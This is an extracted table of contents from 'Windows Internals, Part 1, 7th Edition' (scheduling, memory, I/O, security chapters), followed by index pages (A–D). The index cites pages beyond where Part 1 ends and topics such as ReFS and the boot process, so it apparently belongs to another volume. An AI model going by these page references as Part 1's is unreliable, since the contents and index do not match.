Thread scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 214
Overview of Windows scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 214
Priority levels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 215
Thread states . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .223
Dispatcher database . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .228
Quantum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 231
Priority boosts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .238
Context switching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .255
Scheduling scenarios . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .256
Idle threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .260
Thread suspension . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .264
(Deep) freeze . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .264
Thread selection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .266
Multiprocessor systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .268
Thread selection on multiprocessor systems . . . . . . . . . . . . . . . . . . . .283
Processor selection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .284
Heterogeneous scheduling (big.LITTLE) . . . . . . . . . . . . . . . . . . . . . . . . .286
Group-based scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .287
Dynamic fair share scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .289
CPU rate limits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .292
Dynamic processor addition and replacement . . . . . . . . . . . . . . . . . .295
Worker factories (thread pools) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .297
Worker factory creation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .298
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .300
Chapter 5
Memory management
301
Introduction to the memory manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 301
Memory manager components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .302
Large and small pages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .303
Examining memory usage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .305
Contents of Windows Internals, Part 1, 7th Edition
855
Internal synchronization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .308
Services provided by the memory manager . . . . . . . . . . . . . . . . . . . . . . . . . . .309
Page states and memory allocations . . . . . . . . . . . . . . . . . . . . . . . . . . . . 310
Commit charge and commit limit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313
Locking memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314
Allocation granularity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314
Shared memory and mapped files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 315
Protecting memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 317
Data Execution Prevention . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 319
Copy-on-write . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 321
Address Windowing Extensions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .323
Kernel-mode heaps (system memory pools) . . . . . . . . . . . . . . . . . . . . . . . . . .324
Pool sizes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .325
Monitoring pool usage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .327
Look-aside lists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
Heap manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .332
Process heaps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .333
Heap types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .334
The NT heap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .334
Heap synchronization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .334
The low-fragmentation heap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .335
The segment heap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .336
Heap security features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 341
Heap debugging features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .342
Pageheap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .343
Fault-tolerant heap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .347
Virtual address space layouts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .348
x86 address space layouts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .349
x86 system address space layout . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .352
x86 session space . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .353
System page table entries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .355
ARM address space layout . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .356
64-bit address space layout . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .357
x64 virtual addressing limitations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .359
Dynamic system virtual address space management . . . . . . . . . . . . .359
856
Contents of Windows Internals, Part 1, 7th Edition
System virtual address space quotas . . . . . . . . . . . . . . . . . . . . . . . . . . . .364
User address space layout . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .365
Address translation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
x86 virtual address translation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
Translation look-aside buffer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .377
x64 virtual address translation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .380
ARM virtual address translation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 381
Page fault handling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .383
Invalid PTEs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .384
Prototype PTEs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .385
In-paging I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .386
Collided page faults . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .387
Clustered page faults . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .387
Page files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .389
Commit charge and the system commit limit . . . . . . . . . . . . . . . . . . . .394
Commit charge and page file size . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .397
Stacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .398
User stacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .399
Kernel stacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 400
DPC stack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .401
Virtual address descriptors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .401
Process VADs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .402
Rotate VADs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .403
NUMA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 404
Section objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .405
Working sets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412
Demand paging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 413
Logical prefetcher and ReadyBoot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 413
Placement policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
Working set management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 417
Balance set manager and swapper . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 421
System working sets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .422
Memory notification events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .423
Contents of Windows Internals, Part 1, 7th Edition
857
Page frame number database . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .425
Page list dynamics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .428
Page priority . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .436
Modified page writer and mapped page writer . . . . . . . . . . . . . . . . . .438
PFN data structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440
Page file reservation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 443
Physical memory limits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 446
Windows client memory limits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .447
Memory compression . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 449
Compression illustration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .450
Compression architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .453
Memory partitions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .456
Memory combining . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .459
The search phase . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .460
The classification phase . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 461
The page combining phase . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .462
From private to shared PTE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .462
Combined pages release . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 464
Memory enclaves . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .467
Programmatic interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .468
Memory enclave initializations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .469
Enclave construction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .469
Loading data into an enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 471
Initializing an enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .472
Proactive memory management (SuperFetch) . . . . . . . . . . . . . . . . . . . . . . . .472
Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .473
Tracing and logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .474
Scenarios . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .475
Page priority and rebalancing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .476
Robust performance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .478
ReadyBoost . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .479
ReadyDrive . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .480
Process reflection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .480
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .482
858
Contents of Windows Internals, Part 1, 7th Edition
Chapter 6
I/O system
483
I/O system components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .483
The I/O manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .485
Typical I/O processing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .486
Interrupt Request Levels and Deferred Procedure Calls . . . . . . . . . . . . . . . .488
Interrupt Request Levels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .488
Deferred Procedure Calls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .490
Device drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .492
Types of device drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .492
Structure of a driver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .498
Driver objects and device objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .500
Opening devices. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .507
I/O processing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 510
Types of I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 511
I/O request packets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 513
I/O request to a single-layered hardware-based driver. . . . . . . . . . .525
I/O requests to layered drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .533
Thread-agnostic I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .536
I/O cancellation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .537
I/O completion ports . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 541
I/O prioritization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .546
Container notifications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .552
Driver Verifier . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .552
I/O-related verification options . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .554
Memory-related verification options . . . . . . . . . . . . . . . . . . . . . . . . . . .555
The Plug and Play manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .559
Level of Plug and Play support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .560
Device enumeration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 561
Device stacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .563
Driver support for Plug and Play . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .569
Plug-and-play driver installation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 571
General driver loading and installation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .575
Driver loading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .575
Driver installation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .577
Contents of Windows Internals, Part 1, 7th Edition
859
The Windows Driver Foundation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .578
Kernel-Mode Driver Framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .579
User-Mode Driver Framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .587
The power manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .590
Connected Standby and Modern Standby . . . . . . . . . . . . . . . . . . . . . .594
Power manager operation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .595
Driver power operation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .596
Driver and application control of device power . . . . . . . . . . . . . . . . . .599
Power management framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .600
Power availability requests . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .602
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .603
Chapter 7
Security
605
Security ratings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .605
Trusted Computer System Evaluation Criteria . . . . . . . . . . . . . . . . . . .605
The Common Criteria . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .607
Security system components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .608
Virtualization-based security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 611
Credential Guard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 612
Device Guard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 617
Protecting objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 619
Access checks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 621
Security identifiers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .625
Virtual service accounts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .646
Security descriptors and access control . . . . . . . . . . . . . . . . . . . . . . . . .650
Dynamic Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .666
The AuthZ API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .666
Conditional ACEs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .667
Account rights and privileges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .668
Account rights . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .669
Privileges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .670
Super privileges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .675
Access tokens of processes and threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .677
860
Contents of Windows Internals, Part 1, 7th Edition
Security auditing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .677
Object access auditing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .679
Global audit policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .682
Advanced Audit Policy settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .683
AppContainers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .684
Overview of UWP apps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .685
The AppContainer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .687
Logon . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 710
Winlogon initialization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 711
User logon steps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 713
Assured authentication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 718
Windows Biometric Framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 719
Windows Hello . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 721
User Account Control and virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .722
File system and registry virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . .722
Elevation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .729
Exploit mitigations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .735
Process-mitigation policies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .735
Control Flow Integrity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .740
Security assertions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .752
Application Identification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .756
AppLocker . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .757
Software Restriction Policies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .762
Kernel Patch Protection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .764
PatchGuard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .765
HyperGuard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .768
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .770
Index
771
861
Index
APCs (asynchronous procedure calls), 61–66
APIC, and PIC (Programmable Interrupt
Controller), 37–38
APIC (Advanced Programmable Interrupt
Controller), 35–36
!apic command, 37
APIC Timer, 67
APIs, 690
\AppContainer NamedObjects directory, 160
AppContainers, 243–244
AppExecution aliases, 263–264
apps, activating through command line,
261–262. See also packaged applications
APT (Advanced Persistent Threats), 781
!arbiter command, 48
architectural system service dispatching, 92–95
\ArcName directory, 160
ARM32 simulation on ARM 64 platforms, 115
assembly code, 2
associative cache, 13
atomic execution, 207
attributes, resident and nonresident, 667–670
auto-expand pushlocks, 201
Autoruns tool, 837
autostart services startup, 451–457
AWE (Address Windowing Extension), 201
B
B+ Tree physical layout, ReFS (Resilient File
System), 742–743
background tasks and Broker Infrastructure,
256–258
SYMBOLS
\ (root directory), 692
NUMBERS
32-bit handle table entry, 147
64-bit IDT, viewing, 34–35
A
AAM (Application Activation Manager), 244
ACL (access control list), displaying, 153–154
ACM (authenticated code module), 805–806
!acpiirqarb command, 49
ActivationObject object, 129
ActivityReference object, 129
address-based pushlocks, 201
address-based waits, 202–203
ADK (Windows Assessment and
Deployment Kit), 421
administrative command prompt, opening,
253, 261
AeDebug and AeDebugProtected root keys,
WER (Windows Error Reporting), 540
AES (Advanced Encryption Standard), 711
allocators, ReFS (Resilient File System), 743–745
ALPC (Advanced Local Procedure Call), 209
!alpc command, 224
ALPC message types, 211
ALPC ports, 129, 212–214
ALPC worker thread, 118
APC level, 40, 43, 62, 63, 65
!apciirqarb command, 48
862
Index
Background Broker Infrastructure
Background Broker Infrastructure, 244, 256–258
backing up encrypted files, 716–717
bad-cluster recovery, NTFS recovery support,
703–706. See also clusters
bad-cluster remapping, NTFS, 633
base named objects, looking at, 163–164.
See also objects
\BaseNamedObjects directory, 160
BCD (Boot Configuration Database), 392,
398–399
BCD library for boot operations, 790–792
BCD options
Windows hypervisor loader (Hvloader),
796–797
Windows OS Loader, 792–796
bcdedit command, 398–399
BI (Background Broker Infrastructure), 244,
256–258
BI (Broker Infrastructure), 238
BindFlt (Windows Bind minifilter driver), 248
BitLocker
encryption offload, 717–718
recovery procedure, 801
turning on, 804
block volumes, DAX (Direct Access Disks),
728–730
BNO (Base Named Object) Isolation, 167
BOOLEAN status, 208
boot application, launching, 800–801
Boot Manager
BCD objects, 798
overview, 785–799
and trusted execution, 805
boot menu, 799–800
boot process. See also Modern boot menu
BIOS, 781
driver loading in safe mode, 848–849
hibernation and Fast Startup, 840–844
hypervisor loader, 811–813
images start automatically, 837
kernel and executive subsystems, 818–824
kernel initialization phase 1, 824–829
Measured Boot, 801–805
ReadyBoot, 835–836
safe mode, 847–850
Secure Boot, 781–784
Secure Launch, 816–818
shutdown, 837–840
Smss, Csrss, Wininit, 830–835
trusted execution, 805–807
UEFI, 777–781
VSM (Virtual Secure Mode) startup policy,
813–816
Windows OS Loader, 808–810
WinRE (Windows Recovery
Environment), 845
boot status file, 850
Bootim.exe command, 832
booting from iSCSI, 811
BPB (boot parameter block), 657
BTB (Branch Target Buffer), 11
bugcheck, 40
C
C-states and timers, 76
cache
copying to and from, 584
forcing to write through to disk, 595
cache coherency, 568–569
cache data structures, 576–582
cache manager
in action, 591–594
centralized system cache, 567
disk I/O accounting, 600–601
features, 566–567
lazy writer, 622
mapping views of files, 573
memory manager, 567
memory partitions support, 571–572
NTFS MFT working set enhancements, 571
read-ahead thread, 622–623
recoverable file system support, 570
Index
863
commands
stream-based caching, 569
virtual block caching, 569
write-back cache with lazy write, 589
cache size, 574–576
cache virtual memory management, 572–573
cache-aware pushlocks, 200–201
caches and storage memory, 10
caching
with DMA (direct memory access) inter-
faces, 584–585
with mapping and pinning interfaces, 584
caching and file systems
disks, 565
partitions, 565
sectors, 565
volumes, 565–566
\Callback directory, 160
cd command, 144, 832
CDFS legacy format, 602
CEA (Common Event Aggregator), 238
Centennial applications, 246–249, 261
CFG (Control Flow Integrity), 343
Chain of Trust, 783–784
change journal file, NTFS on-disk structure,
675–679
change logging, NTFS, 637–638
check-disk and fast repair, NTFS recovery
support, 707–710
checkpoint records, NTFS recovery support, 698
!chksvctbl command, 103
CHPE (Compile Hybrid Executable) bitmap,
115–118
CIM (Common Information Model), WMI
(Windows Management Instrumentation),
488–495
CLFS (common logging file system), 403–404
Clipboard User Service, 472
clock time, 57
cloning ReFS files, 755
Close method, 141
clusters. See also bad-cluster recovery
defined, 566
NTFS on-disk structure, 655–656
cmd command, 253, 261, 275, 289, 312, 526, 832
COM-hosted task, 479, 484–486
command line, activating apps through,
261–262
Command Prompt, 833, 845
commands
!acpiirqarb, 49
!alpc, 224
!apciirqarb, 48
!apic, 37
!arbiter, 48
bcdedit, 398–399
Bootim.exe, 832
cd, 144, 832
!chksvctbl, 103
cmd, 253, 261, 275, 289, 312, 526, 832
db, 102
defrag.exe, 646
!devhandles, 151
!devnode, 49
!devobj, 48
dg, 7–8
dps, 102–103
dt, 7–8
dtrace, 527
.dumpdebug, 547
dx, 7, 35, 46, 137, 150, 190
.enumtag, 547
eventvwr, 288, 449
!exqueue, 83
fsutil resource, 693
fsutil storagereserve findById, 687
g, 124, 241
Get-FileStorageTier, 649
Get-VMPmemController, 737
!handle, 149
!idt, 34, 38, 46
!ioapic, 38
!irql, 41
864
Index
commands
commands (continued)
k, 485
link.exe/dump/loadconfig, 379
!locks, 198
msinfo32, 312, 344
notepad.exe, 405
!object, 137–138, 151, 223
perfmon, 505, 519
!pic, 37
!process, 190
!qlocks, 176
!reg openkeys, 417
regedit.exe, 468, 484, 542
Runas, 397
Set-PhysicalDisk, 774
taskschd.msc, 479, 484
!thread, 75, 190
.tss, 8
Wbemtest, 491
wnfdump, 237
committing a transaction, 697
Composition object, 129
compressing
nonsparse data, 673–674
sparse data, 671–672
compression and ghosting, ReFS (Resilient File
System), 769–770
compression and sparse files, NTFS, 637
condition variables, 205–206
connection ports, dumping, 223–224
container compaction, ReFS (Resilient File
System), 766–769
container isolation, support for, 626
contiguous file, 643
copying
to and from cache, 584
encrypted files, 717
CoreMessaging object, 130
corruption record, NTFS recovery support, 708
CoverageSampler object, 129
CPL (Code Privilege Level), 6
CPU branch predictor, 11–12
CPU cache(s), 9–10, 12–13
crash dump files, WER (Windows Error
Reporting), 543–548
crash dump generation, WER (Windows Error
Reporting), 548–551
crash report generation, WER (Windows Error
Reporting), 538–542
crashes, consequences of, 421
critical sections, 203–204
CS (Code Segment)), 31
Csrss, 830–835, 838–840
D
data compression and sparse files, NTFS, 670–671
data redundancy and fault tolerance, 629–630
data streams, NTFS, 631–632
data structures, 184–189
DAX (Direct Access Disks). See also disks
block volumes, 728–730
cached and noncached I/O in volume,
723–724
driver model, 721–722
file system filter driver, 730–731
large and huge pages support, 732–735
mapping executable images, 724–728
overview, 720–721
virtual PMs and storage spaces support,
736–739
volumes, 722–724
